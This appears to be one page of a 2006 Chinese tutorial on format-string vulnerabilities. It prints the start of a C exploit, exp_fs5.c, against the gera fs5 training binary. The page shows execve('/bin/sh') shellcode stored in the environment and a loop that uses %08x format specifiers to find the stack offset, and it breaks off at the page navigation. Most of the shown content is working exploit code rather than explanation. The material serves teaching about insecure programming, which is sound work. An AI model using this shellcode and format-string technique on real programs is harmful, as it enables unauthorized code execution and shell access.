WEB开发网
开发学院网络安全黑客技术 非安全编程演示之格式化字符串(2) 阅读

非安全编程演示之格式化字符串(2)

 2006-04-02 20:26:42 来源:WEB开发网   
核心提示: 演示exploit如下:/*** exp_fs5.c** Coded by Core Security - info@core-sec.com*/#include <string.h>#include <stdio.h>#include <unistd.h&g


演示exploit如下:


/*
** exp_fs5.c
** Coded by Core Security - info@core-sec.com
*/


#include <string.h>
#include <stdio.h>
#include <unistd.h>


#define OBJDUMP "/usr/bin/objdump"
#define VICTIM "/home/user/gera/fs5"
#define GREP "/bin/grep"


/* 24 bytes shellcode */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";


int main() {
char evil_buffer[256], temp_buffer[256];
char *env[3] = {shellcode, NULL};
char *p;
int deregister_address, first_half, second_half, i;
FILE *f;
int ret = 0xbffffffa - strlen(shellcode) -
strlen("/home/user/gera/fs5");


bzero(evil_buffer, sizeof(evil_buffer));
sprintf(evil_buffer, "%s AAAA", VICTIM);


/* Finding stack pop */
printf("\nReading stack frames...\n");
for(i = 0; i < 30; i ++) {
strcat(evil_buffer, "%08x");


f = popen(evil_buffer, "r");
fscanf(f, "%s", temp_buffer);


p = temp_buffer + (4 + i*8);
printf("frame %.2d --> %s\n", (i + 1), p);


if(!strcmp(p, "41414141")) {
printf("\nExact match found. Stack pop is:
%d\n\n", i + 1);
pclose(f);
break;
}
pclose(f);
bzero(temp_buffer, sizeof(temp_buffer));
}

上一页  2 3 4 5 6 7 8  下一页

Tags:安全 编程 演示

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接